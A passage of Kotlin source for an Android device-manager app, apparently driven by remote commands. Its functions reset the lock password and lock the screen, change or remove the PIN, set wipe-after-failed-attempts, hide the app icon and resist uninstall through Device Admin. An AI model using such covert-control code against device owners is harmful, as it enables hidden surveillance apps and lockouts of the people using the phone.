    60тЖТ   119тЖТ   119тЖТ   119тЖТ            if (password.isEmpty()) {
    61тЖТ   120тЖТ   120тЖТ   120тЖТ                return "Password required"
    62тЖТ   121тЖТ   121тЖТ   121тЖТ            }
    63тЖТ   122тЖТ   122тЖТ   122тЖТ            
    64тЖТ   123тЖТ   123тЖТ   123тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
    65тЖТ   124тЖТ   124тЖТ   124тЖТ                // Reset password with new one
    66тЖТ   125тЖТ   125тЖТ   125тЖТ                val result = dpm.resetPassword(
    67тЖТ   126тЖТ   126тЖТ   126тЖТ                    password,
    68тЖТ   127тЖТ   127тЖТ   127тЖТ                    DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY
    69тЖТ   128тЖТ   128тЖТ   128тЖТ                )
    70тЖТ   129тЖТ   129тЖТ   129тЖТ                
    71тЖТ   130тЖТ   130тЖТ   130тЖТ                if (result) {
    72тЖТ   131тЖТ   131тЖТ   131тЖТ                    dpm.lockNow()
    73тЖТ   132тЖТ   132тЖТ   132тЖТ                    "Password set and screen locked"
    74тЖТ   133тЖТ   133тЖТ   133тЖТ                } else {
    75тЖТ   134тЖТ   134тЖТ   134тЖТ                    "Failed to set password"
    76тЖТ   135тЖТ   135тЖТ   135тЖТ                }
    77тЖТ   136тЖТ   136тЖТ   136тЖТ            } else {
    78тЖТ   137тЖТ   137тЖТ   137тЖТ                @Suppress("DEPRECATION")
    79тЖТ   138тЖТ   138тЖТ   138тЖТ                val result = dpm.resetPassword(password, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
    80тЖТ   139тЖТ   139тЖТ   139тЖТ                if (result) {
    81тЖТ   140тЖТ   140тЖТ   140тЖТ                    dpm.lockNow()
    82тЖТ   141тЖТ   141тЖТ   141тЖТ                    "Password set and screen locked"
    83тЖТ   142тЖТ   142тЖТ   142тЖТ                } else {
    84тЖТ   143тЖТ   143тЖТ   143тЖТ                    "Failed to set password"
    85тЖТ   144тЖТ   144тЖТ   144тЖТ                }
    86тЖТ   145тЖТ   145тЖТ   145тЖТ            }
    87тЖТ   146тЖТ   146тЖТ   146тЖТ        } catch (e: Exception) {
    88тЖТ   147тЖТ   147тЖТ   147тЖТ            Log.e(TAG, "Lock with password error", e)
    89тЖТ   148тЖТ   148тЖТ   148тЖТ            "Error: ${e.message}"
    90тЖТ   149тЖТ   149тЖТ   149тЖТ        }
    91тЖТ   150тЖТ   150тЖТ   150тЖТ    }
    92тЖТ   151тЖТ   151тЖТ   151тЖТ
    93тЖТ   152тЖТ   152тЖТ   152тЖТ    // ===== SHOW / HIDE APP ICON =====
    94тЖТ   153тЖТ   153тЖТ   153тЖТ    fun showApp(context: Context): String {
    95тЖТ   154тЖТ   154тЖТ   154тЖТ        return try {
    96тЖТ   155тЖТ   155тЖТ   155тЖТ            val pm = context.packageManager
    97тЖТ   156тЖТ   156тЖТ   156тЖТ            val componentName = ComponentName(context, "com.abuzahra.manager.MainActivity")
    98тЖТ   157тЖТ   157тЖТ   157тЖТ            pm.setComponentEnabledSetting(
    99тЖТ   158тЖТ   158тЖТ   158тЖТ                componentName,
   100тЖТ   159тЖТ   159тЖТ   159тЖТ                PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
   101тЖТ   160тЖТ   160тЖТ   160тЖТ                PackageManager.DONT_KILL_APP
   102тЖТ   161тЖТ   161тЖТ   161тЖТ            )
   103тЖТ   162тЖТ   162тЖТ   162тЖТ            "App icon shown"
   104тЖТ   163тЖТ   163тЖТ   163тЖТ        } catch (e: Exception) {
   105тЖТ   164тЖТ   164тЖТ   164тЖТ            Log.e(TAG, "Show app error", e)
   106тЖТ   165тЖТ   165тЖТ   165тЖТ            "Error: ${e.message}"
   107тЖТ   166тЖТ   166тЖТ   166тЖТ        }
   108тЖТ   167тЖТ   167тЖТ   167тЖТ    }
   109тЖТ   168тЖТ   168тЖТ   168тЖТ
   110тЖТ   169тЖТ   169тЖТ   169тЖТ    fun hideApp(context: Context): String {
   111тЖТ   170тЖТ   170тЖТ   170тЖТ        return try {
   112тЖТ   171тЖТ   171тЖТ   171тЖТ            val pm = context.packageManager
   113тЖТ   172тЖТ   172тЖТ   172тЖТ            val componentName = ComponentName(context, "com.abuzahra.manager.MainActivity")
   114тЖТ   173тЖТ   173тЖТ   173тЖТ            pm.setComponentEnabledSetting(
   115тЖТ   174тЖТ   174тЖТ   174тЖТ                componentName,
   116тЖТ   175тЖТ   175тЖТ   175тЖТ                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
   117тЖТ   176тЖТ   176тЖТ   176тЖТ                PackageManager.DONT_KILL_APP
   118тЖТ   177тЖТ   177тЖТ   177тЖТ            )
   119тЖТ   178тЖТ   178тЖТ   178тЖТ            "App icon hidden"
   120тЖТ   179тЖТ   179тЖТ   179тЖТ        } catch (e: Exception) {
   121тЖТ   180тЖТ   180тЖТ   180тЖТ            Log.e(TAG, "Hide app error", e)
   122тЖТ   181тЖТ   181тЖТ   181тЖТ            "Error: ${e.message}"
   123тЖТ   182тЖТ   182тЖТ   182тЖТ        }
   124тЖТ   183тЖТ   183тЖТ   183тЖТ    }
   125тЖТ   184тЖТ   184тЖТ   184тЖТ
   126тЖТ   185тЖТ   185тЖТ   185тЖТ    // ===== CHANGE PASSCODE / SET PIN =====
   127тЖТ   186тЖТ   186тЖТ   186тЖТ    fun changePasscode(context: Context, params: Map<String, Any>): String {
   128тЖТ   187тЖТ   187тЖТ   187тЖТ        return try {
   129тЖТ   188тЖТ   188тЖТ   188тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   130тЖТ   189тЖТ   189тЖТ   189тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   131тЖТ   190тЖТ   190тЖТ   190тЖТ            
   132тЖТ   191тЖТ   191тЖТ   191тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   133тЖТ   192тЖТ   192тЖТ   192тЖТ                return "Device Admin not active. Enable it first."
   134тЖТ   193тЖТ   193тЖТ   193тЖТ            }
   135тЖТ   194тЖТ   194тЖТ   194тЖТ            
   136тЖТ   195тЖТ   195тЖТ   195тЖТ            val password = params["password"]?.toString() ?: params["arg"]?.toString() ?: ""
   137тЖТ   196тЖТ   196тЖТ   196тЖТ            if (password.isEmpty()) {
   138тЖТ   197тЖТ   197тЖТ   197тЖТ                return "Password required. Usage: password"
   139тЖТ   198тЖТ   198тЖТ   198тЖТ            }
   140тЖТ   199тЖТ   199тЖТ   199тЖТ            
   141тЖТ   200тЖТ   200тЖТ   200тЖТ            // Check password quality requirements
   142тЖТ   201тЖТ   201тЖТ   201тЖТ            if (password.length < 4) {
   143тЖТ   202тЖТ   202тЖТ   202тЖТ                return "Password must be at least 4 characters"
   144тЖТ   203тЖТ   203тЖТ   203тЖТ            }
   145тЖТ   204тЖТ   204тЖТ   204тЖТ            
   146тЖТ   205тЖТ   205тЖТ   205тЖТ            val result = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   147тЖТ   206тЖТ   206тЖТ   206тЖТ                dpm.resetPassword(
   148тЖТ   207тЖТ   207тЖТ   207тЖТ                    password,
   149тЖТ   208тЖТ   208тЖТ   208тЖТ                    DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY
   150тЖТ   209тЖТ   209тЖТ   209тЖТ                )
   151тЖТ   210тЖТ   210тЖТ   210тЖТ            } else {
   152тЖТ   211тЖТ   211тЖТ   211тЖТ                @Suppress("DEPRECATION")
   153тЖТ   212тЖТ   212тЖТ   212тЖТ                dpm.resetPassword(password, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   154тЖТ   213тЖТ   213тЖТ   213тЖТ            }
   155тЖТ   214тЖТ   214тЖТ   214тЖТ            
   156тЖТ   215тЖТ   215тЖТ   215тЖТ            if (result) {
   157тЖТ   216тЖТ   216тЖТ   216тЖТ                "Password changed successfully"
   158тЖТ   217тЖТ   217тЖТ   217тЖТ            } else {
   159тЖТ   218тЖТ   218тЖТ   218тЖТ                "Failed to change password"
   160тЖТ   219тЖТ   219тЖТ   219тЖТ            }
   161тЖТ   220тЖТ   220тЖТ   220тЖТ        } catch (e: Exception) {
   162тЖТ   221тЖТ   221тЖТ   221тЖТ            Log.e(TAG, "Change passcode error", e)
   163тЖТ   222тЖТ   222тЖТ   222тЖТ            "Error: ${e.message}"
   164тЖТ   223тЖТ   223тЖТ   223тЖТ        }
   165тЖТ   224тЖТ   224тЖТ   224тЖТ    }
   166тЖТ   225тЖТ   225тЖТ   225тЖТ    
   167тЖТ   226тЖТ   226тЖТ   226тЖТ    fun setPin(context: Context, params: Map<String, Any>): String {
   168тЖТ   227тЖТ   227тЖТ   227тЖТ        return changePasscode(context, params)
   169тЖТ   228тЖТ   228тЖТ   228тЖТ    }
   170тЖТ   229тЖТ   229тЖТ   229тЖТ    
   171тЖТ   230тЖТ   230тЖТ   230тЖТ    fun removePin(context: Context): String {
   172тЖТ   231тЖТ   231тЖТ   231тЖТ        return try {
   173тЖТ   232тЖТ   232тЖТ   232тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   174тЖТ   233тЖТ   233тЖТ   233тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   175тЖТ   234тЖТ   234тЖТ   234тЖТ            
   176тЖТ   235тЖТ   235тЖТ   235тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   177тЖТ   236тЖТ   236тЖТ   236тЖТ                return "Device Admin not active"
   178тЖТ   237тЖТ   237тЖТ   237тЖТ            }
   179тЖТ   238тЖТ   238тЖТ   238тЖТ            
   180тЖТ   239тЖТ   239тЖТ   239тЖТ            // Set empty password to remove
   181тЖТ   240тЖТ   240тЖТ   240тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   182тЖТ   241тЖТ   241тЖТ   241тЖТ                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   183тЖТ   242тЖТ   242тЖТ   242тЖТ            } else {
   184тЖТ   243тЖТ   243тЖТ   243тЖТ                @Suppress("DEPRECATION")
   185тЖТ   244тЖТ   244тЖТ   244тЖТ                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   186тЖТ   245тЖТ   245тЖТ   245тЖТ            }
   187тЖТ   246тЖТ   246тЖТ   246тЖТ            
   188тЖТ   247тЖТ   247тЖТ   247тЖТ            "PIN removed"
   189тЖТ   248тЖТ   248тЖТ   248тЖТ        } catch (e: Exception) {
   190тЖТ   249тЖТ   249тЖТ   249тЖТ            "Error: ${e.message}"
   191тЖТ   250тЖТ   250тЖТ   250тЖТ        }
   192тЖТ   251тЖТ   251тЖТ   251тЖТ    }
   193тЖТ   252тЖТ   252тЖТ   252тЖТ
   194тЖТ   253тЖТ   253тЖТ   253тЖТ    // ===== PASSWORD POLICIES =====
   195тЖТ   254тЖТ   254тЖТ   254тЖТ    fun setPasswordQuality(context: Context, params: Map<String, Any>): String {
   196тЖТ   255тЖТ   255тЖТ   255тЖТ        return try {
   197тЖТ   256тЖТ   256тЖТ   256тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   198тЖТ   257тЖТ   257тЖТ   257тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   199тЖТ   258тЖТ   258тЖТ   258тЖТ            
   200тЖТ   259тЖТ   259тЖТ   259тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   201тЖТ   260тЖТ   260тЖТ   260тЖТ                return "Device Admin not active"
   202тЖТ   261тЖТ   261тЖТ   261тЖТ            }
   203тЖТ   262тЖТ   262тЖТ   262тЖТ            
   204тЖТ   263тЖТ   263тЖТ   263тЖТ            val quality = params["quality"]?.toString() ?: "something"
   205тЖТ   264тЖТ   264тЖТ   264тЖТ            
   206тЖТ   265тЖТ   265тЖТ   265тЖТ            val qualityConstant = when (quality.lowercase()) {
   207тЖТ   266тЖТ   266тЖТ   266тЖТ                "unspecified" -> DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED
   208тЖТ   267тЖТ   267тЖТ   267тЖТ                "something" -> DevicePolicyManager.PASSWORD_QUALITY_SOMETHING
   209тЖТ   268тЖТ   268тЖТ   268тЖТ                "numeric" -> DevicePolicyManager.PASSWORD_QUALITY_NUMERIC
   210тЖТ   269тЖТ   269тЖТ   269тЖТ                "numeric_complex" -> DevicePolicyManager.PASSWORD_QUALITY_NUMERIC_COMPLEX
   211тЖТ   270тЖТ   270тЖТ   270тЖТ                "alphabetic" -> DevicePolicyManager.PASSWORD_QUALITY_ALPHABETIC
   212тЖТ   271тЖТ   271тЖТ   271тЖТ                "alphanumeric" -> DevicePolicyManager.PASSWORD_QUALITY_ALPHANUMERIC
   213тЖТ   272тЖТ   272тЖТ   272тЖТ                "complex" -> DevicePolicyManager.PASSWORD_QUALITY_COMPLEX
   214тЖТ   273тЖТ   273тЖТ   273тЖТ                else -> DevicePolicyManager.PASSWORD_QUALITY_SOMETHING
   215тЖТ   274тЖТ   274тЖТ   274тЖТ            }
   216тЖТ   275тЖТ   275тЖТ   275тЖТ            
   217тЖТ   276тЖТ   276тЖТ   276тЖТ            dpm.setPasswordQuality(adminComponent, qualityConstant)
   218тЖТ   277тЖТ   277тЖТ   277тЖТ            "Password quality set to $quality"
   219тЖТ   278тЖТ   278тЖТ   278тЖТ        } catch (e: Exception) {
   220тЖТ   279тЖТ   279тЖТ   279тЖТ            "Error: ${e.message}"
   221тЖТ   280тЖТ   280тЖТ   280тЖТ        }
   222тЖТ   281тЖТ   281тЖТ   281тЖТ    }
   223тЖТ   282тЖТ   282тЖТ   282тЖТ    
   224тЖТ   283тЖТ   283тЖТ   283тЖТ    fun setPasswordMinimumLength(context: Context, params: Map<String, Any>): String {
   225тЖТ   284тЖТ   284тЖТ   284тЖТ        return try {
   226тЖТ   285тЖТ   285тЖТ   285тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   227тЖТ   286тЖТ   286тЖТ   286тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   228тЖТ   287тЖТ   287тЖТ   287тЖТ            
   229тЖТ   288тЖТ   288тЖТ   288тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   230тЖТ   289тЖТ   289тЖТ   289тЖТ                return "Device Admin not active"
   231тЖТ   290тЖТ   290тЖТ   290тЖТ            }
   232тЖТ   291тЖТ   291тЖТ   291тЖТ            
   233тЖТ   292тЖТ   292тЖТ   292тЖТ            val length = (params["length"] as? Number)?.toInt() 
   234тЖТ   293тЖТ   293тЖТ   293тЖТ                ?: params["arg"]?.toString()?.toIntOrNull() 
   235тЖТ   294тЖТ   294тЖТ   294тЖТ                ?: 6
   236тЖТ   295тЖТ   295тЖТ   295тЖТ            
   237тЖТ   296тЖТ   296тЖТ   296тЖТ            dpm.setPasswordMinimumLength(adminComponent, length)
   238тЖТ   297тЖТ   297тЖТ   297тЖТ            "Minimum password length set to $length"
   239тЖТ   298тЖТ   298тЖТ   298тЖТ        } catch (e: Exception) {
   240тЖТ   299тЖТ   299тЖТ   299тЖТ            "Error: ${e.message}"
   241тЖТ   300тЖТ   300тЖТ   300тЖТ        }
   242тЖТ   301тЖТ   301тЖТ   301тЖТ    }
   243тЖТ   302тЖТ   302тЖТ   302тЖТ    
   244тЖТ   303тЖТ   303тЖТ   303тЖТ    fun setMaximumFailedPasswords(context: Context, params: Map<String, Any>): String {
   245тЖТ   304тЖТ   304тЖТ   304тЖТ        return try {
   246тЖТ   305тЖТ   305тЖТ   305тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   247тЖТ   306тЖТ   306тЖТ   306тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   248тЖТ   307тЖТ   307тЖТ   307тЖТ            
   249тЖТ   308тЖТ   308тЖТ   308тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   250тЖТ   309тЖТ   309тЖТ   309тЖТ                return "Device Admin not active"
   251тЖТ   310тЖТ   310тЖТ   310тЖТ            }
   252тЖТ   311тЖТ   311тЖТ   311тЖТ            
   253тЖТ   312тЖТ   312тЖТ   312тЖТ            val attempts = (params["attempts"] as? Number)?.toInt()
   254тЖТ   313тЖТ   313тЖТ   313тЖТ                ?: params["arg"]?.toString()?.toIntOrNull()
   255тЖТ   314тЖТ   314тЖТ   314тЖТ                ?: 5
   256тЖТ   315тЖТ   315тЖТ   315тЖТ            
   257тЖТ   316тЖТ   316тЖТ   316тЖТ            dpm.setMaximumFailedPasswordsForWipe(adminComponent, attempts)
   258тЖТ   317тЖТ   317тЖТ   317тЖТ            "Device will wipe after $attempts failed password attempts"
   259тЖТ   318тЖТ   318тЖТ   318тЖТ        } catch (e: Exception) {
   260тЖТ   319тЖТ   319тЖТ   319тЖТ            "Error: ${e.message}"
   261тЖТ   320тЖТ   320тЖТ   320тЖТ        }
   262тЖТ   321тЖТ   321тЖТ   321тЖТ    }
   263тЖТ   322тЖТ   322тЖТ   322тЖТ
   264тЖТ   323тЖТ   323тЖТ   323тЖТ    // ===== BIOMETRIC =====
   265тЖТ   324тЖТ   324тЖТ   324тЖТ    fun enableBiometric(context: Context): String {
   266тЖТ   325тЖТ   325тЖТ   325тЖТ        return try {
   267тЖТ   326тЖТ   326тЖТ   326тЖТ            // Check if biometric is available
   268тЖТ   327тЖТ   327тЖТ   327тЖТ            val biometricManager = BiometricManager.from(context)
   269тЖТ   328тЖТ   328тЖТ   328тЖТ            val canAuthenticate = when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
   270тЖТ   329тЖТ   329тЖТ   329тЖТ                BiometricManager.BIOMETRIC_SUCCESS -> true
   271тЖТ   330тЖТ   330тЖТ   330тЖТ                BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -> return "No biometric hardware"
   272тЖТ   331тЖТ   331тЖТ   331тЖТ                BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -> return "Biometric hardware unavailable"
   273тЖТ   332тЖТ   332тЖТ   332тЖТ                BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -> {
   274тЖТ   333тЖТ   333тЖТ   333тЖТ                    // Open settings to enroll
   275тЖТ   334тЖТ   334тЖТ   334тЖТ                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
   276тЖТ   335тЖТ   335тЖТ   335тЖТ                        context.startActivity(Intent(Settings.ACTION_BIOMETRIC_ENROLL).apply {
   277тЖТ   336тЖТ   336тЖТ   336тЖТ                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   278тЖТ   337тЖТ   337тЖТ   337тЖТ                        })
   279тЖТ   338тЖТ   338тЖТ   338тЖТ                    } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   280тЖТ   339тЖТ   339тЖТ   339тЖТ                        context.startActivity(Intent(Settings.ACTION_FINGERPRINT_ENROLL).apply {
   281тЖТ   340тЖТ   340тЖТ   340тЖТ                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   282тЖТ   341тЖТ   341тЖТ   341тЖТ                        })
   283тЖТ   342тЖТ   342тЖТ   342тЖТ                    } else {
   284тЖТ   343тЖТ   343тЖТ   343тЖТ                        context.startActivity(Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   285тЖТ   344тЖТ   344тЖТ   344тЖТ                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   286тЖТ   345тЖТ   345тЖТ   345тЖТ                        })
   287тЖТ   346тЖТ   346тЖТ   346тЖТ                    }
   288тЖТ   347тЖТ   347тЖТ   347тЖТ                    return "No biometric enrolled. Opening settings"
   289тЖТ   348тЖТ   348тЖТ   348тЖТ                }
   290тЖТ   349тЖТ   349тЖТ   349тЖТ                BiometricManager.BIOMETRIC_ERROR_SECURITY_UPDATE_REQUIRED -> return "Security update required"
   291тЖТ   350тЖТ   350тЖТ   350тЖТ                BiometricManager.BIOMETRIC_ERROR_UNSUPPORTED -> return "Biometric unsupported"
   292тЖТ   351тЖТ   351тЖТ   351тЖТ                BiometricManager.BIOMETRIC_STATUS_UNKNOWN -> return "Biometric status unknown"
   293тЖТ   352тЖТ   352тЖТ   352тЖТ                else -> false
   294тЖТ   353тЖТ   353тЖТ   353тЖТ            }
   295тЖТ   354тЖТ   354тЖТ   354тЖТ            
   296тЖТ   355тЖТ   355тЖТ   355тЖТ            if (canAuthenticate) {
   297тЖТ   356тЖТ   356тЖТ   356тЖТ                "Biometric is available and configured"
   298тЖТ   357тЖТ   357тЖТ   357тЖТ            } else {
   299тЖТ   358тЖТ   358тЖТ   358тЖТ                "Biometric not available"
   300тЖТ   359тЖТ   359тЖТ   359тЖТ            }
   301тЖТ   360тЖТ   360тЖТ   360тЖТ        } catch (e: Exception) {
   302тЖТ   361тЖТ   361тЖТ   361тЖТ            Log.e(TAG, "Enable biometric error", e)
   303тЖТ   362тЖТ   362тЖТ   362тЖТ            "Error: ${e.message}"
   304тЖТ   363тЖТ   363тЖТ   363тЖТ        }
   305тЖТ   364тЖТ   364тЖТ   364тЖТ    }
   306тЖТ   365тЖТ   365тЖТ   365тЖТ
   307тЖТ   366тЖТ   366тЖТ   366тЖТ    fun disableBiometric(context: Context): Map<String, Any> {
   308тЖТ   367тЖТ   367тЖТ   367тЖТ        return try {
   309тЖТ   368тЖТ   368тЖТ   368тЖТ            val intent = when {
   310тЖТ   369тЖТ   369тЖТ   369тЖТ                Build.VERSION.SDK_INT >= Build.VERSION_CODES.R -> {
   311тЖТ   370тЖТ   370тЖТ   370тЖТ                    Intent(Settings.ACTION_BIOMETRIC_ENROLL).apply {
   312тЖТ   371тЖТ   371тЖТ   371тЖТ                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   313тЖТ   372тЖТ   372тЖТ   372тЖТ                        putExtra("biometric_enroll", true)
   314тЖТ   373тЖТ   373тЖТ   373тЖТ                    }
   315тЖТ   374тЖТ   374тЖТ   374тЖТ                }
   316тЖТ   375тЖТ   375тЖТ   375тЖТ                Build.VERSION.SDK_INT >= Build.VERSION_CODES.P -> {
   317тЖТ   376тЖТ   376тЖТ   376тЖТ                    Intent(Settings.ACTION_FINGERPRINT_ENROLL).apply {
   318тЖТ   377тЖТ   377тЖТ   377тЖТ                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   319тЖТ   378тЖТ   378тЖТ   378тЖТ                    }
   320тЖТ   379тЖТ   379тЖТ   379тЖТ                }
   321тЖТ   380тЖТ   380тЖТ   380тЖТ                else -> {
   322тЖТ   381тЖТ   381тЖТ   381тЖТ                    Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   323тЖТ   382тЖТ   382тЖТ   382тЖТ                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   324тЖТ   383тЖТ   383тЖТ   383тЖТ                    }
   325тЖТ   384тЖТ   384тЖТ   384тЖТ                }
   326тЖТ   385тЖТ   385тЖТ   385тЖТ            }
   327тЖТ   386тЖТ   386тЖТ   386тЖТ            context.startActivity(intent)
   328тЖТ   387тЖТ   387тЖТ   387тЖТ            mapOf(
   329тЖТ   388тЖТ   388тЖТ   388тЖТ                "status" to "opened_settings",
   330тЖТ   389тЖТ   389тЖТ   389тЖТ                "message" to "Opening security/biometric settings. Biometric cannot be disabled programmatically for security reasons - user must manually remove biometric data.",
   331тЖТ   390тЖТ   390тЖТ   390тЖТ                "action_required" to "user_manual_removal"
   332тЖТ   391тЖТ   391тЖТ   391тЖТ            )
   333тЖТ   392тЖТ   392тЖТ   392тЖТ        } catch (e: Exception) {
   334тЖТ   393тЖТ   393тЖТ   393тЖТ            mapOf("error" to (e.message ?: "Failed to open settings"))
   335тЖТ   394тЖТ   394тЖТ   394тЖТ        }
   336тЖТ   395тЖТ   395тЖТ   395тЖТ    }
   337тЖТ   396тЖТ   396тЖТ   396тЖТ    
   338тЖТ   397тЖТ   397тЖТ   397тЖТ    fun getBiometricStatus(context: Context): Map<String, Any> {
   339тЖТ   398тЖТ   398тЖТ   398тЖТ        return try {
   340тЖТ   399тЖТ   399тЖТ   399тЖТ            val biometricManager = BiometricManager.from(context)
   341тЖТ   400тЖТ   400тЖТ   400тЖТ            val status = biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)
   342тЖТ   401тЖТ   401тЖТ   401тЖТ            
   343тЖТ   402тЖТ   402тЖТ   402тЖТ            val statusMessage = when (status) {
   344тЖТ   403тЖТ   403тЖТ   403тЖТ                BiometricManager.BIOMETRIC_SUCCESS -> "Biometric ready"
   345тЖТ   404тЖТ   404тЖТ   404тЖТ                BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -> "No biometric hardware"
   346тЖТ   405тЖТ   405тЖТ   405тЖТ                BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -> "Hardware unavailable"
   347тЖТ   406тЖТ   406тЖТ   406тЖТ                BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -> "No biometric enrolled"
   348тЖТ   407тЖТ   407тЖТ   407тЖТ                BiometricManager.BIOMETRIC_ERROR_SECURITY_UPDATE_REQUIRED -> "Security update required"
   349тЖТ   408тЖТ   408тЖТ   408тЖТ                BiometricManager.BIOMETRIC_ERROR_UNSUPPORTED -> "Unsupported"
   350тЖТ   409тЖТ   409тЖТ   409тЖТ                BiometricManager.BIOMETRIC_STATUS_UNKNOWN -> "Status unknown"
   351тЖТ   410тЖТ   410тЖТ   410тЖТ                else -> "Unknown status"
   352тЖТ   411тЖТ   411тЖТ   411тЖТ            }
   353тЖТ   412тЖТ   412тЖТ   412тЖТ            
   354тЖТ   413тЖТ   413тЖТ   413тЖТ            mapOf(
   355тЖТ   414тЖТ   414тЖТ   414тЖТ                "status_code" to status,
   356тЖТ   415тЖТ   415тЖТ   415тЖТ                "status" to statusMessage,
   357тЖТ   416тЖТ   416тЖТ   416тЖТ                "can_authenticate" to (status == BiometricManager.BIOMETRIC_SUCCESS)
   358тЖТ   417тЖТ   417тЖТ   417тЖТ            )
   359тЖТ   418тЖТ   418тЖТ   418тЖТ        } catch (e: Exception) {
   360тЖТ   419тЖТ   419тЖТ   419тЖТ            mapOf("error" to (e.message ?: "Unknown error"))
   361тЖТ   420тЖТ   420тЖТ   420тЖТ        }
   362тЖТ   421тЖТ   421тЖТ   421тЖТ    }
   363тЖТ   422тЖТ   422тЖТ   422тЖТ
   364тЖТ   423тЖТ   423тЖТ   423тЖТ    // ===== ANTI UNINSTALL =====
   365тЖТ   424тЖТ   424тЖТ   424тЖТ    fun antiUninstallOn(context: Context): String {
   366тЖТ   425тЖТ   425тЖТ   425тЖТ        return try {
   367тЖТ   426тЖТ   426тЖТ   426тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   368тЖТ   427тЖТ   427тЖТ   427тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   369тЖТ   428тЖТ   428тЖТ   428тЖТ            
   370тЖТ   429тЖТ   429тЖТ   429тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   371тЖТ   430тЖТ   430тЖТ   430тЖТ                // Request device admin
   372тЖТ   431тЖТ   431тЖТ   431тЖТ                return "Device Admin must be activated for anti-uninstall protection. Use request_device_admin first."
   373тЖТ   432тЖТ   432тЖТ   432тЖТ            }
   374тЖТ   433тЖТ   433тЖТ   433тЖТ            
   375тЖТ   434тЖТ   434тЖТ   434тЖТ            // Device admin already provides anti-uninstall protection
   376тЖТ   435тЖТ   435тЖТ   435тЖТ            "Anti-uninstall protection active (Device Admin enabled)"
   377тЖТ   436тЖТ   436тЖТ   436тЖТ        } catch (e: Exception) {
   378тЖТ   437тЖТ   437тЖТ   437тЖТ            Log.e(TAG, "Anti-uninstall on error", e)
   379тЖТ   438тЖТ   438тЖТ   438тЖТ            "Error: ${e.message}"
   380тЖТ   439тЖТ   439тЖТ   439тЖТ        }
   381тЖТ   440тЖТ   440тЖТ   440тЖТ    }
   382тЖТ   441тЖТ   441тЖТ   441тЖТ
   383тЖТ   442тЖТ   442тЖТ   442тЖТ    fun antiUninstallOff(context: Context): String {
   384тЖТ   443тЖТ   443тЖТ   443тЖТ        return try {
   385тЖТ   444тЖТ   444тЖТ   444тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   386тЖТ   445тЖТ   445тЖТ   445тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   387тЖТ   446тЖТ   446тЖТ   446тЖТ            
   388тЖТ   447тЖТ   447тЖТ   447тЖТ            if (dpm.isAdminActive(adminComponent)) {
   389тЖТ   448тЖТ   448тЖТ   448тЖТ                Log.w(TAG, "antiUninstallOff: Removing Device Admin entirely (all policies will be lost)")
   390тЖТ   449тЖТ   449тЖТ   449тЖТ                dpm.removeActiveAdmin(adminComponent)
   391тЖТ   450тЖТ   450тЖТ   450тЖТ                "Warning: Device Admin removed entirely. All admin policies are now disabled."
   392тЖТ   451тЖТ   451тЖТ   451тЖТ            } else {
   393тЖТ   452тЖТ   452тЖТ   452тЖТ                "Device Admin was not active"
   394тЖТ   453тЖТ   453тЖТ   453тЖТ            }
   395тЖТ   454тЖТ   454тЖТ   454тЖТ        } catch (e: Exception) {
   396тЖТ   455тЖТ   455тЖТ   455тЖТ            Log.e(TAG, "Anti-uninstall off error", e)
